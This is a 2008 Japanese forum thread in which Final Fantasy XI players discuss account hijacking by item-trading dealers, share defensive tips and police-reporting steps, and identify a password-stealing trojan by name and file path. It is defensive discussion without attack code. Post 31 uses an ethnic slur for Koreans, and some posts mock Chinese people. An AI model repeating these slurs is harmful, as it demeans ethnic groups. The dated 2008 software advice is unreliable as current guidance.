全部 1- 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 最新50  

●● RMT業者の垢ハックが多発している件37 ●●

1 名前:既にその名前は使われています:2008/08/20(水) 05:10:52 ID:oHCLEqq8
★このスレで紹介されるURL(外部リンク)を踏むのは、すべて自己責任でお願いします
  ・Windows及びFlashPlayerなどのソフトが最新の状態であることを確認してください
  ・使用ブラウザのスクリプト実行を不許可にすることをお勧めします
★前スレ ●● RMT業者の垢ハックが多発している件36 ●● http://changi.2ch.net/test/read.cgi/ogame/1218621315/

■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を)
   不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
   受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
■テンプレ = ttp://miku.xrea.jp/template/ (「一般テンプレ」に関してはこちらのサイトをご覧ください)

■まとめサイト
FF11Warning(垢ハックについての対策とか詳しく載ってます) ttp://miku.xrea.jp/
     (xreaが不安な人はミラーサイトへ = ttp://www.geocities.jp/ff11warning/)
FFIX Virus問題 まとめサイト(初心者さん向け) ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
【FF11】アカウント不正ログイン被害まとめ(スレNo.20以前の過去ログあり) ttp://ort.sakura.ne.jp/taisai/
★「巻き戻し情報」「スクエニに法的責任を!」「誰が悪いかランキング」「被害者の会を作れ」などは別スレでお願いします。
  別スレ ●● FF11垢ハック巻き戻し状況報告スレ2 ●● http://changi.2ch.net/test/read.cgi/ogame/1218868358/
★そのサイトが安全かどうかの鑑定が欲しいかたは↓に行ってください(このスレでの鑑定依頼はNGです)
  勇気がなくて踏めない人のための鑑定スレPart18 http://pc11.2ch.net/test/read.cgi/hack/1208760889/
  ※専ブラで画像を先に読み込む仕様になっている場合は設定を変えてください(jpg偽装のウイルスとかも鑑定されているようです)

2 名前:既にその名前は使われています:2008/08/20(水) 05:12:24 ID:oHCLEqq8
----------アカハック被害報告用テンプレ(書ききれない場合は複数レスに分けて下さい)----------
●気付いた日時(アカハック被害に気付いた日時)
●不審なアドレスのクリックの有無(blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス、ドメインのドット(.)を○等で置き換える事。h抜き等は駄目)
●他人が貴方のIDを使用したことが一度でもあるか(Yes/No)
●ID・Passの認証方法(POLに保存/自動ログイン/手打ち、途中で変更した場合はその履歴、例:自動ログイン→○月○日から手打ち、等)
●Pass変更の履歴(した/していない・していたならパスの最終更新日、等)
●他人が貴方のPCを使う可能性の有無(Yes/No)
●ツールの使用の有無:Yes/No・Yesの場合はそのToolの説明
●ネットカフェの利用の有無:Yes/No
●使っているOS(SP等まで書く)
●使用ブラウザ(バージョン等まで分かれば書く)
●WindowsUpdateの有無(最終更新日、等)
●FlashPlayerとRealPlayerのバージョン(更新日時をわかる範囲で・未導入であれば無し)
●アンチウイルスソフト(たとえば NortonInternetSecurity2008 等の名称、及びパターン更新日)
●その他のSecurty対策(Spybot S&D、ルータ、等)
●ウイルススキャン結果(たとえば カスペルスキーオンラインスキャンでC:\WINDOWS\System32\○○.DLLをTrojan.W32○○として発見 等)
●スレログやテンプレを読んだか(Yes/No/今から読みます)
●hosts変更(有/無・有りの場合は最終更新は何時ごろか)
●PeerGuardian2の導入(有/無・有りの場合は参照元サイトはどこか)
●その他情報・症状など(書ききれない場合は次レスで書いてください)

3 名前:既にその名前は使われています:2008/08/20(水) 05:13:08 ID:oHCLEqq8
■各種ソフトのアップデート報告(情報提供等)について
スレ内を検索しやすいように各種ソフトのupdate情報には符丁をつけておくことを推奨します。

★FlashPlayerなどAdobe系ソフト、Firefoxなどブラウザ、NoScriptなどアドオンなどの更新があったときには
 ※※各種ソフトウェアアップデート情報※※

★セキュリティホールに関するニュースが出たときには
 ※※セキュリティホール情報※※

を付けてみてください。

4 名前:既にその名前は使われています:2008/08/20(水) 05:19:13 ID:oHCLEqq8
■具体的な自衛策その1(詳細は「>>1」の FF11Warningさんのところをじっくり読まれることをお勧めします)
1:ウイルススキャンソフト(ウィルス駆除ソフト)を導入する(有料でも無料でも、とりあえず入れる)
2:Windows UpdateでWindowsを最新の状態にする(自動更新を外している人は定期的に手動更新必須です)
3:ファイアウォールを有効にする。
   有料ソフト等に同梱されているもの(同梱でなければ同じ会社から出ているもの)を使うか、フリーの
   ファイアウォールソフトを探し導入する(2chカテゴリ「ネット関係」>「セキュリティ」板にフリーの
   ファイアウォールソフトのスレッドがあります。「ファイアウォール」などの単語で検索してください)
4:PeerGuardian2(IPフィルタソフト)を導入する。
  ※リネージュ資料室からリンクされているHPにて配布されているPeerGuardian2日本語版がダウンロード
   できない模様(8月4日報告)。メニューは同じなので日本語マニュアルページと解説HPみながら英語版で。
   ★PG2公式 = ttp://phoenixlabs.org/pg2/
   ★DLページ(日本語サイト) = ttp://www.altech-ads.com/product/10002223.htm
   ★日本語マニュアル = ttp://www.dukedog.flnet.org/Library/PG2/PG_Guide.html
  ※設定方法はここから
   ★リネージュ資料室 = ttp://lineage.paix.jp/guide/security/basic-ipfilter.html
   ★PG2導入解説動画(改訂版)ニコ動 = ttp://www.nicovideo.jp/watch/nm2825098
5:Firefox、Opera、Safariなど、IE以外のウェブブラウザを使用する。
  それぞれのブラウザにセキュリティホールが見つかることもあるので、アップデート情報には注意してください。
6:ネ実・mixi・ブログ等にある不審なURLを踏む場合は、まず「aguse.jp」や「ソースチェッカー」を使用する。
  ★aguse GATEWAY = ttp://www.aguse.jp/  ★ソースチェッカーオンライン = ttp://so.7walker.net/

5 名前:既にその名前は使われています:2008/08/20(水) 05:21:08 ID:oHCLEqq8
■具体的な自衛策その2
7:SecuniaPSI(各種アプリケーション・プラグインソフトが最新版であるかどうかをチェックするソフト)の導入。
   ★Secunia公式ページ = ttps://psi.secunia.com/
   ★SecuniaPSI RC3ダウンロードページ(日本語解説付き) = ttp://cowscorpion.com/Security/SecuniaPSI.html
8:プラグイン他、各種ソフトの更新
  Flashplayer、Realplayer、Shockwaveplayer、Quicktime、Adobe Acrobat/ReaderなどのソフトはOSやブラウザの
  更新と同じように更新を怠り無く。
   ★FlashPlayerのバージョン確認 = ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
   最新(現在は 9.0.124.0)未満の場合
   ★Adobeアップデート ttp://www.adobe.com/jp/downloads/updates/ で更新するか
   ★Adobeダウンロード ttp://www.adobe.com/jp/downloads で最新版と入れ替えてください。
   ※FlashPlayerはウェブブラウザごとに更新する必要があります。IEとFx使用なら両方で更新しましょう。
9:HIPS(レジストリや設定ファイルの変更を監視するソフト)の導入。
  Unleak・Spybot(Teatimer)などのレジストリ変更を監視してくれるソフトを入れておくと、今回のような
  レジストリ改ざんで動作するウィルスに対して「レジストリが変更される前に変更を許可するかどうかを
  問い合わせてくれる」ので「怪しい」と思った場合はそれを拒否することによってウィルスの活動を阻害し
  症状の発症を食い止めてくれます。
   ★Unleak = ttp://soft3304.net/Unleak/  ★Spybot = ttp://www.spybot.info/jp/
   ※レジストリ(あるいはシステム)を監視するソフトは複数入れると動作に問題が出ますから注意です。

6 名前:既にその名前は使われています:2008/08/20(水) 05:22:09 ID:oHCLEqq8
■PeerGuardian2(IPフィルタソフト)を導入する について補足

PG2の日本語版があちらサイトよりDLできない状況が長引いています
あちらサイトがメンテかCGIサーバに不具合が出ている可能性はそろそろ薄れてきました
いまでも状況は見ていますが、とりあえず日本語版が欲しいかたは

Web archive

ttp://web.archive.org/web/20080209171747/ttp://www.dukedog.flnet.org/trans.html

こちらよりDLすることができます(2008年2月9日にWeb archiveが拾ったデータです)
・Virus Totalに投げて不具合等はありませんでした
・このURLから飛ぶと日本語が文字化けするかもしれませんが、エンコードを日本語選択にすれば解消します
・拾えなくなって困るソフトに関しては、お手元で外部媒体に保存されることを推奨します

7 名前:既にその名前は使われています:2008/08/20(水) 05:24:28 ID:oHCLEqq8
■警察への被害届け
1:まず住んでいる都道府県警が設置しているサイバー犯罪相談窓口に相談の電話やメール送信をしておきます。
  都道府県警察本部のサイバー犯罪相談窓口等一覧 = ttp://www.npa.go.jp/cyber/soudan.htm
2:相談窓口から「所轄の警察署に直接行って相談するように」という返事が来ます。
  (この段階を踏まずに直接所轄署に行くと「専門の窓口に連絡しろ」と言われてしまう可能性があります)
3:所轄署に電話で連絡し、直接訪問して話を聞いてもらえるか確認します。
4:資料を持参して所轄の署に赴き「利用権の侵害」での被害を報告します。
  「たかがゲームのアイテムを取られたからって警察に行くなんて…」という方もいるかもしれませんが
  家族やネット上、またこのスレッド内でそういったことを言われても気にせず警察に相談しください。
  利用権の侵害というのは立派な被害です。警察の方もちゃんと話を聞いてくれます。
■警察へ行く際に持っていく・用意しておくもの(過去スレで実際に警察へ行った被害者のレスから抜粋)
持っていったもの
 ●身分証明、印鑑  ●スクエニの会社情報  ●HPのプリントアウトしたもの
 ●プレイオンラインサポセンの電話番号(受け答えしてくれたサポセンの人の名前も伝えるといいかも)
警察で聞かれたもの
 ●プレイオンラインのIDとパスワード  ●キャラ名  ●犯行時間帯
 ●被害内容(なくなったゲーム内通貨・アイテム) ●プロバイダ

8 名前:既にその名前は使われています:2008/08/20(水) 05:32:01 ID:n6VMVPAK
ハック業者が詐欺容疑で停止されたなw

ttp://rating5.auctions.yahoo.co.jp/jp/show/rating?userID=gogonaku

販売後にハックされたといって取り戻し再度転売w普通に犯罪ですw

9 名前:既にその名前は使われています:2008/08/20(水) 06:14:41 ID:oHCLEqq8
テンプレのミラーは、URLを公開されていないのでここに勝手に出して
いいものやらどうなのやら・・・

10 名前:既にその名前は使われています:2008/08/20(水) 06:17:15 ID:LbYh2xV6
ミラーのアドレスは、前々スレで管理人さんが書き込みに来ていた記憶があるけど?

11 名前:既にその名前は使われています:2008/08/20(水) 06:22:01 ID:fScc6itC
Noscript 1.7.9きてる

12 名前:既にその名前は使われています:2008/08/20(水) 07:18:19 ID:oHCLEqq8
>>10
FF11Warningさんのメインサイトのミラーはトップにも出してありますが
テンプレサイトのほうはまだご紹介いただいてないと思います

13 名前:既にその名前は使われています:2008/08/20(水) 07:35:45 ID:LbYh2xV6
あー、勘違いしてた・・すまぬ
あるってことは言っていたから平気だとは思うけど、どうなんだろう

14 名前:既にその名前は使われています:2008/08/20(水) 08:01:34 ID:E6odtqIX
PG2の日本語版て公式から落とせなくなったのか。

どこかにバックアップをうpしている所ないかな?

15 名前:既にその名前は使われています:2008/08/20(水) 08:09:01 ID:oHCLEqq8
>>14

とりあえず >>6 で落とせます

16 名前:既にその名前は使われています:2008/08/20(水) 09:15:34 ID:eS2PV4D9
>>8
自分でアカ売って、その後ハックされたとかいってたのか。
警察届け出とかあったろうし業者マジいかれてる。

17 名前:既にその名前は使われています:2008/08/20(水) 09:22:32 ID:SRPOCrWK
言葉足らずですみません ミラー=同構成っす。
ミラーのほうのテンプレも 同じディレクトリ名になります。
ttp://www.geocities.jp/ff11warning/template/

18 名前:既にその名前は使われています:2008/08/20(水) 12:13:59 ID:Ga7RfQNJ
保守保守

19 名前:既にその名前は使われています:2008/08/20(水) 12:32:48 ID:E6odtqIX
>>15
テンプレ長すぎて気付かなかったw
d

20 名前:既にその名前は使われています:2008/08/20(水) 13:20:00 ID:BXNZrbN+
保守
Flashplayer    Ver9.0.124.0にしよう!
Realplayer    削除しよう!
WindowsUpdate   常に最新にしよう!

21 名前:既にその名前は使われています:2008/08/20(水) 14:15:26 ID:fScc6itC
708 名前:既にその名前は使われています[] 投稿日:2008/08/20(水) 14:06:43 ID:+9JF6enO
バイトって責任は正社員と同じだけど賃金は低いよね・・・。

とりあえずネタ投下
URLをコピペしたら悪質サイトに――乗っ取り被害が続出
ttp://headlines.yahoo.co.jp/hl?a=20080820-00000042-zdn_ep-sci

雑談スレからコピペ。これやばいトロイだな

22 名前:既にその名前は使われています:2008/08/20(水) 14:34:57 ID:hoyEgEjT
貼ろうとしたらもうあった。 さすが>>21

23 名前:既にその名前は使われています:2008/08/20(水) 14:37:20 ID:BXNZrbN+
>>21
>不正スクリプトを仕込んだFlashが使われているもよう。

age進行でよろ

24 名前:既にその名前は使われています:2008/08/20(水) 14:53:09 ID:jc0scvPp
>>17
お手数をおかけしました、ありがとうございますm(_ _)m

■テンプレサイト = ttp://www.geocities.jp/ff11warning/template/
           (ttp://miku.xrea.jp/template/のミラーサイト)
 ※一般テンプレ」に関してはこちらのサイトをご覧ください

25 名前:既にその名前は使われています:2008/08/20(水) 14:59:17 ID:jc0scvPp
※※各種ソフトウェアアップデート情報※※

NoScript 1.7.9 の更新がきてます

26 名前:既にその名前は使われています:2008/08/20(水) 15:30:24 ID:3vKddS9z
また変なの出てきたな
flash更新してない奴の被害報告が増えそう

27 名前:既にその名前は使われています:2008/08/20(水) 15:35:10 ID:rFdRuFlp
業者むかつく。
マジでぶん殴りたい。

28 名前:既にその名前は使われています:2008/08/20(水) 16:38:12 ID:7R3VpkA0
>>27
中華<悔しかったら海を渡ってこいアルwww
     国認定の事業だしw

29 名前:既にその名前は使われています:2008/08/20(水) 18:09:50 ID:GkXA2GzI
>>27
前スレにちらっと書いてるけど
>>2のテンプレを書いてくれよ〜?
解約しても業者は復活して根こそぎもっていくぜw

30 名前:既にその名前は使われています:2008/08/20(水) 18:19:05 ID:EBkcqUBP
「よくわかんないけど垢ハックされたから引退します><」
とか言って必要な手続きもせずに放置する馬鹿が一番のカモだろうな

そんなカモがいるかぎり垢ハックが減ることはない

31 名前:既にその名前は使われています:2008/08/20(水) 18:35:53 ID:ntSL8NiX
解約したところで業者消えるわけじゃないからねぇ
ネットショッピングや重要情報やり取りすれば、必ずチョソの影がちらついてくる
実は、ネトゲだけに留まる問題じゃないんだよね

32 名前:既にその名前は使われています:2008/08/20(水) 18:47:55 ID:rFdRuFlp
>>29
復活させないように、同じID使えないようにした。


33 名前:既にその名前は使われています:2008/08/20(水) 18:57:29 ID:amTsW1v9
日本語化したPG2ってソースコードのとこに置いてあったから直に持って来て使ってた。
管理者の意向に沿わないアクセスだし、版数の保障も出来ないから言わなかったけど、
>>6と同じ物だと確認できた。

34 名前:既にその名前は使われています:2008/08/20(水) 19:03:54 ID:RlLSk4ey
注意喚起マダー?

35 名前:既にその名前は使われています:2008/08/20(水) 19:14:38 ID:1MjI/uyd
http://www.mcafee.com/japan/security/virPQ2007.asp?v=PWS-OnlineGames.a

コレ見て思ったんだけど、
>>情報の収集はユーザのキー入力、マウスクリックを追跡して行われます。
手入力は危険性高いって分かるんだが、ソフトウェアキーボードってマウスポインタ位置座標のトレースされてないのかな〜?
危険性変わらないんじゃ・・・


36 名前:既にその名前は使われています:2008/08/20(水) 19:39:23 ID:nofUKG3b
そんなとこまで心配してたらなにもできない・・・
マウスクリック時のアクティブウィンドウのSS撮って送るマルウェアもあるらしいが

37 名前:既にその名前は使われています:2008/08/20(水) 19:59:35 ID:JODrwLRZ
PGで弾いたIPが危険かどうか調べたいんですけど方法はないのでしょうか?
弾いてる時点で危険だと言うのは分かるんですが、何故そこに繋がるかが知りたいので

ネトゲをやっている途中に定期的に物凄いpingになってPGも表示されるので
不安で仕方がない

38 名前:既にその名前は使われています:2008/08/20(水) 20:21:49 ID:0Og9smMJ
>>37
テンプレ>>4

39 名前:既にその名前は使われています:2008/08/20(水) 20:31:50 ID:jc0scvPp
>>37
正確に言えば、弾いているだけでは危険かどうかはわかりません
わたしも何度か引っかかりましたが、Planet Labの中国IPに、使っている
ソフトがアップデートに行くこともあります
PG2そのもののアップデートで中国IPを弾くこともありますから
不安であればその都度調べる必要はあると思います
(放置しても問題はありませんが)
単純に弾いているIPそのものを検索サイトで検索すれば、安全なのか
危険なのか、そのあたりの情報はなにか見つかると思いますよ

40 名前:既にその名前は使われています:2008/08/20(水) 20:34:54 ID:jc0scvPp
>>37
書き忘れた

わたしはカスペルスキーを使っていないのでわかりませんが、カスペルスキーも
アップデートのために中国IPに接続に行くそうです

41 名前:既にその名前は使われています:2008/08/20(水) 20:46:01 ID:JODrwLRZ
ありがとうございます
私はavastです
手当たり次第の自動upを手動に切り替えても何処かに繋ぎにいっているので
不安でした。ゲームをやる時だけ繋ぎに行くのでなんともかんとも

42 名前:既にその名前は使われています:2008/08/20(水) 20:51:23 ID:jc0scvPp
>>41
そのIP、控えておみえならここに出してみませんか
わたしも調べますが、どなたかおわかりになるかたにレスいただけるかも
しれません

43 名前:既にその名前は使われています:2008/08/20(水) 20:58:47 ID:3vKddS9z
avast愛用者だったけどスキャンの遅さに業を煮やして
aviraに変えたらメッチャ軽くなったぜ


44 名前:既にその名前は使われています:2008/08/20(水) 21:04:29 ID:JODrwLRZ
210.92.102.182:29900
219.87.140.245:29900
59.148.181.35.29900
59.148.181.34:29900

以上が送信先です

45 名前:既にその名前は使われています:2008/08/20(水) 21:09:43 ID:6uQoW7Xq
>>44
素人だからできれば詳しい人が来るまで待って欲しいけど、
それどっかのオンゲの鯖っぽいよ。下二つはぐぐるとバトルフィールドの名前が出てくるね。
ポート29900とかも

46 名前:既にその名前は使われています:2008/08/20(水) 21:17:23 ID:JODrwLRZ
あーそのゲームです。お手数かけてすみません
では、安全なようですね。前までは無かったので驚きました

普通にネットをやっているだけで13時から21時の間に
約90も弾いているので1個1個調べて行きます
なんか一人で舞い上がってしまってスミマセンでした


47 名前:既にその名前は使われています:2008/08/20(水) 21:18:50 ID:ETLZZMwk
>>44
ルタ使用なしかなー。
それとネトゲって具体的になにやってるか教えて貰えると把握しやすいかも。
そこに出てるIPはスパマ鯖で割りと良く見るドメインだったけど、Pingくらいだったらいたるところから飛んでくるしなあ。

48 名前:既にその名前は使われています:2008/08/20(水) 21:21:43 ID:JwQj/c2U
うはnoscriptアップデートしなくて良かったわw

49 名前:既にその名前は使われています:2008/08/20(水) 21:25:17 ID:JODrwLRZ
ルーターは使用していません
バトルフィールド2142です


50 名前:既にその名前は使われています:2008/08/20(水) 21:28:33 ID:ETLZZMwk
Pingが叩きこまれるのはBFプレイ中なんだよね?
そしたらスパムPing叩きこんでゲーム通信邪魔しようとしてんじゃないの。
BFやったことないから、相手プレイヤーの接続IP見れるのかはわかんないけどw

51 名前:既にその名前は使われています:2008/08/20(水) 21:39:41 ID:jc0scvPp
>>41
回答は出ているようですけど、よっつともエレクトロニック・アーツの
サーバのようですね
210が韓国、219が台湾、51が香港のIPでした

210のIPはスパムメールに関係している部分もあったので疑ってみましたが
そこにつながる情報は見つかりませんでした

52 名前:既にその名前は使われています:2008/08/20(水) 21:43:18 ID:JODrwLRZ
ゲームに参加し始めの1ゲーム目に起こり
pingが1000を超え接続が悪いと点滅します
しばらくするとその警告が無くなり普通にゲームをする事が出来ます
PG2を切っていてもこの状態が起こるので、ゲーム内で仕様が変わったのかもしれません

プレイヤ間ではIP見る事が出来ないので妨害とかは無いと思います
起こっているのは自分だけ見たいなので。
RMTに遠いゲムでFFと関係なさそうなので、これで消えます

アドバイスくれた方ありがとうございました


あのゲームは広告費を払うとゲーム内のオブジェクトに広告を表示させる事が出来るので
悪さをしようと思えば出来そうですね・・・

53 名前:既にその名前は使われています:2008/08/20(水) 21:49:01 ID:gzGUpjMF
PG2の初回起動時にデフォルトで選べるフィルタする項目(広告とか教育機関とか)の
タイトルとURLを教えてください。
初回に選択しそびれたお(´・ω・`)

54 名前:既にその名前は使われています:2008/08/20(水) 21:54:54 ID:jc0scvPp
>>53
リストにデフォルトで入っていますから、追加でURLを選んでやれば
そのまま設定されますよ

こうゆうとき英語版だと説明がしづらいな・・・

たぶん、リスト管理>追加>URLで選べると思います

55 名前:既にその名前は使われています:2008/08/20(水) 22:00:09 ID:lNt4eFLB
再インストールすればいいじゃん

56 名前:既にその名前は使われています:2008/08/20(水) 22:02:02 ID:6uQoW7Xq
hxxp://peerguardian.sourceforge.net/lists/p2p.php
だね、デフォで入れられるやつは。(xx→tt)
でも不具合が出たりすることもあるみたいだから、使い心地とかを調べながらやった方がよさそ

57 名前:既にその名前は使われています:2008/08/20(水) 22:02:19 ID:gzGUpjMF
>>54
アッター。
ここのURLリストに格納されてたのね。
サンキュ

58 名前:既にその名前は使われています:2008/08/20(水) 22:11:53 ID:jc0scvPp
PG2って、公式には出てないですけどベータ6c(英語版)があるんですね
テンプレに書いた日本語DLサイトから落とせるのはベータ6cでした
ファイルサイズがベータ6bの倍あるのですけど、いったいどこがどう
変わっているのかよくわかりません
英語サイトを翻訳してみましたけどちんぷんかんぷんだったり・・・

とりあえずいまソレを使ってみてますけど、動作もベータ6bとなにも
違いはないようです

59 名前:既にその名前は使われています:2008/08/20(水) 22:29:40 ID:DAT2nemK
こんなの出てきた
Trojan-GameThief.Win32.OnLineGames.stoy

C:\WINDOWS\system32\KernaeghDrv.dll

60 名前:既にその名前は使われています:2008/08/20(水) 22:31:06 ID:6uQoW7Xq
>>59
今一番旬なウイルスでアウアウです。
そのPCでFFやってるなら完全にアウアウアウです

61 名前:既にその名前は使われています:2008/08/20(水) 23:42:39 ID:45UCGVEk
羽入かわいいよ谷亮子

62 名前:既にその名前は使われています:2008/08/21(木) 00:19:12 ID:4rGT625v
前スレの>>720で書いたことを、いまFF用PCで試しています
Unleak・TeaTimer・Windows Defenderのみっつを入れて見ていますが
いまのところ問い合わせでFFを落とされることはありません
それぞれの設定は、とりあえずデフォルトです

Unleakは8時間ほど学習させましたが、POL及びFFがレジストリに干渉してくる
状況は見受けられませんでした
ただ、ネット用のPCだとUnleakとSpybotとWindows Defenderの組み合わせに
とくに大きな問題(Spybotがレジストリを読めなくて実行不能を出してくる状況は
ありますが)はありませんでしたが、FF用PCだとUnleakを入れた段階でSpybot本体が
起ち上がってこない状況が見られました(TeaTimerのほうはレジストリ変更を問い
合わせてきますので、生きていると思います)
ほかのネットゲームはなにもしていませんのでFF以外のことはわかりませんが
FFに関しては、なにかひとつHIPSを導入することは問題ないように思います

63 名前:既にその名前は使われています:2008/08/21(木) 01:24:14 ID:7l+G06UL
普通は保持情報って暗号化されてるだろうから、自動ログインが一番安全だったりするよね?

64 名前:既にその名前は使われています:2008/08/21(木) 01:27:24 ID:6Fpy7AqS
中華「自動ログインウマー」

65 名前:既にその名前は使われています:2008/08/21(木) 01:47:44 ID:4rGT625v
PG2日本語版の再配布は著作権に引っかかるものでしょうか

もともとのPG2(英語版)はオープンソースであり、使用許諾にもPG2の
出所を詐称しなければ再配布しても問題なしのようなことが書かれて
いますが、オープンソースを使って手を加えたソフトの場合、そこに
著作権は発生するものでしょうか

66 名前:既にその名前は使われています:2008/08/21(木) 02:00:42 ID:4rGT625v
って書いたけど、微妙にすれちだなぁ・・・

日本語化サイトさんの掲示板にも書いてはきましたけど、レスがもらえるような
状況でもなさそうなので、いま拾えるテンプレのリンクからDLされたかたは
リカバリー用にご自身で保存しておいてくださいね

日本語版の再配布をしてもいいかどうかが不明なので、Web archiveから拾える
間だけ日本語版が使えると思ってていただいていいかもです

リネ資の管理人さんはどう対応されるんだろ・・・

まぁ英語版も日本語版も設定でなにも変わるところはないから、日本語マニュアルを
見ながら英語版の設定をするならなにも問題はないけど・・・なぁ・・・

67 名前:既にその名前は使われています:2008/08/21(木) 02:03:18 ID:6Fpy7AqS
オープンソースなんだから日本語版だろうと著作権は元の英語版だろ

オープンソースにいくら手を加えても同じライセンスって決まりごとじゃ無いっけ

68 名前:既にその名前は使われています:2008/08/21(木) 02:13:37 ID:DmFj6ppW
>>65
PG2でググって、一番上を開いて、セクション2.5を読め

69 名前:既にその名前は使われています:2008/08/21(木) 02:14:30 ID:ZXTJSMzM
POLのログオンパスワードだけでなく、IDも変更可能にしないとだわなー
一度ハックされたIDは復活してもまた狙われやすいだろし

70 名前:既にその名前は使われています:2008/08/21(木) 02:21:45 ID:TdMko/ZY
>>48
NoScriptの最新Verって何か不具合あったのかな。kwsk

71 名前:既にその名前は使われています:2008/08/21(木) 02:23:27 ID:4rGT625v
>>68
読んだ結果で書きました

でも、それはあくまでわたしがPG2を作った場合にであれば再配布をしても問題がない
表記なので、日本語版を作られたかたが、このオープンソースになにか制限をつけて
いる場合があると困るので、日本語版を作られたかたの許諾なしには再配布できない
可能性を考えています

72 名前:既にその名前は使われています:2008/08/21(木) 02:27:06 ID:DmFj6ppW
>>71
ライセンスの3に書いてあることを声に出して100回読んで理解できなければ、止めたほうがいい。

73 名前:既にその名前は使われています:2008/08/21(木) 02:30:30 ID:4rGT625v
>>72
やめときます

74 名前:既にその名前は使われています:2008/08/21(木) 02:47:37 ID:LjpWQJLY
わろた

75 名前:既にその名前は使われています:2008/08/21(木) 03:44:48 ID:OXI7QypR
Firefoxを使っていて、どうしてもって所以外はJavaを常に切っていたけど
やはり心配なのでnoscriptを導入してみました。
前スレに、Mozillaのサイトのアドオンに紹介であったはずって事なので、
確実だろうと思いここからインストール。
許可をしろってブロック(今みたらブラウザのセキュリティかな)表示後
許可しないとどうしようもないので、許可した後DLのウインドが出たけど
表示されてるファイルが「noscript-1.7.9-fx+mz+sm.xpi 署名がありません」
って事だけどこれでOKですよね?
再起動が必要なのでブラウザを再起動したら、ホームとは別にもう一枚
tp://noscript.net/?ver=1.7.9&prev=が表示されたけどこれまたOKなのかな?
初歩的な質問ですみません。
ここ最近、全部疑ってネットをするようになってしまった(´・ω・`)

>>48
入れたばかりの身としては気になる・・・

76 名前:既にその名前は使われています:2008/08/21(木) 03:48:23 ID:4rGT625v
>>75
動作は正常です

77 名前:既にその名前は使われています:2008/08/21(木) 04:18:10 ID:4rGT625v
NoScriptの最新版、なにも問題ないけどな
とくに不具合の報告も見つからないし
ついでにRedirect Remover(2.5.5)も入れておくといいかもです

78 名前:既にその名前は使われています:2008/08/21(木) 06:49:16 ID:/zCPX6Gu
今どきルーターも通さずにネット繋いでる人が居ること自体、驚くぜ。

79 名前:既にその名前は使われています:2008/08/21(木) 07:45:52 ID:FQLG67bE
今時ルーターも危ないからじゃね

80 名前:既にその名前は使われています:2008/08/21(木) 08:34:20 ID:dqq8t2jC
ネトゲもうやってないからどうでもいいやとか思ったけど
hostsファイル消されてて最悪

81 名前:既にその名前は使われています:2008/08/21(木) 08:59:41 ID:9wIIC7F2
>>59
俺も拾った。というかhostsファイルはデリられているし
ついでに検索かけてもコマンドプロトコルから削除しようにも
C:\WINDOWS\system32\KernaeghDrv.dllは存在しませんと出る始末
おいおい、ファイル名実行で動くんだけどどこにあるんだよ……

82 名前:既にその名前は使われています:2008/08/21(木) 09:13:16 ID:Uhlh2rW2
>>78
ルータに脆弱性があるリスクを勘案しても、ルータ無しより遥かに安全だろうな
>>81
他に使えるPCが無くて暫定的にでも回復させる必要があるならセーフモードでやれよ

83 名前:既にその名前は使われています:2008/08/21(木) 09:32:45 ID:/zCPX6Gu
>>82
うむ。「今どきはルーター通してても危ない」→「だから使わない」じゃ、タダのアフォ。
セキュリティってのは、万一を想定して、あらかじめ打てる手は全て打っておくもの。

84 名前:既にその名前は使われています:2008/08/21(木) 09:34:58 ID:dt3wf7AU
保守
Flashplayer    Ver9.0.124.0にしよう!
Realplayer    削除しよう!
WindowsUpdate   常に最新にしよう!

>NoScriptの最新版
オプション押したとき英語表記だった場所が日本語になってるだけかもしれないw

85 名前:既にその名前は使われています:2008/08/21(木) 10:27:26 ID:Tuis7RzI
垢ハク後、ウィルスソフトもいれ、PGもいれ、FWも設定し
それでも怖くて毎日カスペルオンライン先生に完全スキャンをお願いする
俺ガイルorz


86 名前:既にその名前は使われています:2008/08/21(木) 10:37:27 ID:l6QuiQme
コンドームを使っても確実に避妊が出来るわけではないのと同じだな

87 名前:既にその名前は使われています:2008/08/21(木) 11:15:01 ID:3wiq3Dva
>>85
まさかとは思うが、いまだにIEを「中」設定で使ってたりしないよな?

88 名前:既にその名前は使われています:2008/08/21(木) 11:20:39 ID:Tuis7RzI
>>87
カスタムにしてる。
通常ネットは別のPCでしている。
たまーに仕事で使うときがある程度。
もうショートカットすら消してしまった。


89 名前:既にその名前は使われています:2008/08/21(木) 12:40:24 ID:dt3wf7AU
保守
Flashplayer    Ver9.0.124.0にしよう!
Realplayer    削除しよう!
WindowsUpdate   常に最新にしよう!

90 名前:既にその名前は使われています:2008/08/21(木) 13:03:40 ID:7O6YJaKq
>>86
コンドーム使って妊娠するのって使い方間違ってるとか
穴空いてるとかそう言う理由なんだよね?

射精時の精子がコンドームの膜突き破る訳じゃないよね?

91 名前:既にその名前は使われています:2008/08/21(木) 13:05:15 ID:pUF+qrQK
>>90
どんだけ活発な精子なんだwwwww


スレ違いアゲ

92 名前:既にその名前は使われています:2008/08/21(木) 13:46:36 ID:OWm1pYQa
>>81
KernaeghDrv.dllは名前変えてることがあるから、フルネーム指定で探すと
見つからないことがあるかも(Kernaegh1Drv.dllとか)

93 名前:既にその名前は使われています:2008/08/21(木) 13:48:04 ID:yd4HjZ++
>>91
ヒント;エイリアン

94 名前:既にその名前は使われています:2008/08/21(木) 14:04:01 ID:AG5F2IOr
確かに軽かった「ノートン2009」、ベータ版レビュー
http://internet.watch.impress.co.jp/cda/special/2008/08/21/20594.html

「Opera 9.52」リリース、脆弱性7件の修正など
http://internet.watch.impress.co.jp/cda/news/2008/08/21/20616.html

トレンドマイクロ、不具合で新検索エンジンの公開延期
http://internet.watch.impress.co.jp/cda/news/2008/08/20/20612.html

95 名前:既にその名前は使われています:2008/08/21(木) 14:13:07 ID:v5z9zHen
なんでもかんでも張るなよ

96 名前:既にその名前は使われています:2008/08/21(木) 14:22:38 ID:9wIIC7F2
>>91
ニュータイプ
生殖妨害なんだから突然変異でゴムを溶解する精子ができても不思議ではない

>>92
どうやら俺の検索が間違っていたらしい……
面倒くさいからレジストリももう一度掃除しておいた

97 名前:既にその名前は使われています:2008/08/21(木) 14:26:16 ID:Dwz7f3Z5
NoScriptなんだけどさ、アイコンが可愛くない(ってか怖い)んで差し替えて使ってるはw
WinRAR使えばできるお^^

